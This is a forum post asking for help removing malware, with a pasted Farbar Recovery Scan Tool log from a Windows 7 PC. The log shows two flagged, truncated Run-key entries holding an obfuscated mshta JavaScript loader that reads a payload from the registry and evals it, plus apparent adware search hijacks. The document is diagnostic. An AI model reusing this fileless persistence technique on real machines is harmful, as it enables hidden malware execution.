Hi there
I was hoping for some help in removing malware. Avast has been pinging like mad since this morning. Avast doesn’t seem to remove it even when i run a system scan.
Have run a Farbar Recovery Scan Tool test as recommended elsewhere on the forum. I’ve pasted the results below in the hope that someone might be able to help with eradicating the problem. Thanks in advance for any suggestions
FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 21-06-2015 01
Ran by home (administrator) on HOME-PC on 22-06-2015 11:49:14
Running from C:\Users\home\Desktop
Loaded Profiles: home (Available Profiles: home & Remote)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe
(FTR Pty. Ltd.) C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdcBase.exe
(TomTom) C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(NCH Software) C:\Program Files\NCH Software\Scribe\scribe.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_14_0_0_125_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(FileZilla Project) C:\Users\home\Downloads\FileZilla_3.7.1_win32\FileZilla-3.7.1\filezilla.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM.…\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM.…\Run: [LogMeIn GUI] => C:\Program Files\LogMeIn\x86\LogMeInSystray.exe [63048 2013-04-30] (LogMeIn, Inc.)
HKLM.…\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM.…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227648 2015-03-30] (AVAST Software)
HKLM.…\Run: [AgentMonitor] => C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe [391040 2014-04-17] ()
HKLM.…\Run: [FTR Search Folders] => C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe [94208 2012-12-06] (FTR Pty. Ltd.)
HKLM.…\Run: [MSRS] => C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software)
HKLM.…\Run: [EE MORPHO ModemListener] => C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe [159056 2014-05-16] ()
HKLM.…\Run: [Windows Mobile-based device management] => C:\Windows\WindowsMobile\wmdcBase.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM.…\Run: [**ae5247d6<>] => mshta javascript:qF3FqNEcm=“zX6biHBz2U”;P3Y=new%20ActiveXObject(“WScript.Shell”);AD9hXrw=“1EafLBrD”;cvk4J6=P3Y.RegRead(“HKLM\software\ae8c3fee\6fecae9c”);m1t9pCUD=“71P5TNR”;eval(cvk4J6);C2BueEz3="6 (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\Policies\Explorer\Run: [] =>
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [MyDriveConnect.exe] => C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe [1905032 2015-04-28] (TomTom)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5503768 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {48b0afcb-e586-11e3-9bdf-001e4fd3631b} - F:\InnoTabSetup.exe
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {eae30f1f-a85c-11e4-b8fc-001e4fd3631b} - F:\autorun.exe
HKU\S-1-5-18.…\Run: [**ae5247d6<>] => mshta javascript:x6kvoQz4=“rLhTIzQy”;v2N=new%20ActiveXObject(“WScript.Shell”);FFfUbEV5=“VuLd”;u4z7kO=v2N.RegRead(“HKCU\software\ae8c3fee\6fecae9c”);hgRf2bBNH=“s7Vqtqu05i”;eval(u4z7kO);YB7XtxSd="CxK (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\AppCertDlls: [x64] → c:\program files\settings manager\smdmf\x64\sysapcrt.dll
ShellIconOverlayIdentifiers: [00avast] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2014-12-31] (AVAST Software)
CHR HKU\S-1-5-21-1304999761-2293218496-246315724-1000\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://uk.msn.com/?ocid=iehp
SearchScopes: HKLM → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
BHO: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2014-12-31] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: {1ABA5FAC-1417-422B-BA82-45C35E2C908B} http://kitchenplanner.ikea.com/JP/Core/Player/2020PlayerAX_IKEA_Win32.cab
DPF: {8A5BE387-D09A-4DFA-A56B-DCB89BD11468} https://spaces.diy.com/2020Spaces_main/UI/idealSpaces/AE/AppEngine/RoomEngine/Core/Player/2020PlayerAX_WEB_Win32.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
FireFox:
FF ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Google (avast)
FF DefaultSearchUrl: https://www.google.com/search/?trackid=sp-006
FF SearchEngineOrder.1: Google (avast)
FF SelectedSearchEngine: Google (avast)
FF Homepage: https://www.google.com/?trackid=sp-006
FF Keyword.URL: https://www.google.com/search/?trackid=sp-006
FF Plugin: @adobe.com/FlashPlayer → C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll [2012-09-01] ()
FF Plugin: @java.com/DTPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE → disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: Adobe Reader → C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml [2013-03-04]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml [2014-12-30]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\google-avast.xml [2015-02-22]
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\default-search.xml [2014-12-30]
FF HKLM.…\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-12-06]
Chrome:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java™ Platform SE 7 U9) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\Windows\system32\npDeployJava1.dll No File
CHR Profile: C:\Users\home\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-27]
CHR Extension: (Google Cast) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-11-27]
CHR Extension: (Avast Online Security) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-08]
CHR Extension: (Google Wallet) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-10]
CHR HKLM.…\Chrome\Extension: [fgbcffenncokfocljomejddmgcpppjom] - https://clients2.google.com/service/update2/crx
CHR HKLM.…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-31]
========================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-31] (AVAST Software)
R2 EE MORPHO Modem Device Helper; C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe [58192 2013-06-18] ()
S2 MSRSService; C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software) [File not signed]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-10-13] (DEVGURU Co., LTD.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-12-31] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-12-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [81768 2014-12-31] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-12-31] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-12-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [423784 2014-12-31] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [91496 2014-12-31] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-12-31] ()
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [38400 2009-06-09] (Samsung Electronics Co., Ltd.) [File not signed]
S4 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [219352 2009-06-05] (Intel Corporation)
R2 SSPORT; C:\Windows\system32\Drivers\SSPORT.sys [5120 2008-01-10] (Samsung Electronics) [File not signed]
S4 LMIRfsClientNP; No ImagePath
S3 SWVNIC; system32\DRIVERS\swvnic.sys
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-06-22 11:28 - 2015-06-22 11:29 - 00034577 _____ C:\Users\home\Desktop\Addition.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00014309 _____ C:\Users\home\Desktop\FRST.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00000000 ____D C:\FRST
2015-06-22 11:26 - 2015-06-22 11:26 - 01148928 _____ (Farbar) C:\Users\home\Desktop\FRST.exe
2015-06-19 08:55 - 2015-06-19 08:55 - 00000396 _____ C:\Windows\PFRO.log
2015-05-31 17:06 - 2015-05-31 17:06 - 00000000 ____D C:\Users\home\Desktop\Enforcement of right of way
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-06-22 11:43 - 2013-06-25 17:39 - 00000000 ____D C:\Users\home\Documents*** work
2015-06-22 11:11 - 2012-11-06 11:42 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:00 - 2012-09-09 23:34 - 00000000 ____D C:\Users\home\AppData\Roaming\FileZilla
2015-06-22 10:59 - 2012-08-20 20:43 - 01277635 _____ C:\Windows\WindowsUpdate.log
2015-06-22 10:56 - 2015-03-09 10:21 - 00019408 _____ C:\Windows\setupact.log
2015-06-22 10:56 - 2012-11-06 11:42 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-22 10:56 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-20 18:23 - 2015-03-16 10:50 - 00000000 ____D C:\Users\home\Documents*l
2015-06-20 16:28 - 2012-09-09 23:07 - 00000000 ____D C:\Users\home\Documents\My docs
2015-06-20 14:04 - 2013-05-03 16:54 - 00000000 ____D C:\Users\home\Documents\Scanned docs
2015-06-19 12:32 - 2015-04-23 12:10 - 00000000 ____D C:\Users\home\Documents* LLP
2015-06-06 17:31 - 2009-07-14 05:52 - 00000000 ____D C:\Windows\system32\FxsTmp
2015-06-05 17:33 - 2012-10-24 16:20 - 00000000 ____D C:\Users\home\Documents***
2015-06-05 12:48 - 2015-03-16 11:56 - 00000000 ____D C:\Users\home\Documents***
2015-05-27 16:59 - 2012-08-20 20:48 - 00726316 _____ C:\Windows\system32\PerfStringBackup.INI
==================== Files in the root of some directories =======
2012-08-20 21:01 - 2012-08-20 21:01 - 0000040 _____ () C:\Users\home\AppData\Roaming\burnaware.ini
2014-05-27 11:09 - 2014-05-27 11:11 - 0000581 _____ () C:\Users\home\AppData\Local\cookies.ini
2013-05-03 16:44 - 2013-05-03 16:44 - 0000057 _____ () C:\ProgramData\Ament.ini
2012-08-20 21:47 - 2012-08-20 21:47 - 0001534 _____ () C:\ProgramData\ss.ini
Files to move or delete:
C:\Users\home\CTX.DAT
Some files in TEMP:
C:\Users\Remote\AppData\Local\Temp\AskSLib.dll
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-06-15 08:26
==================== End of log ============================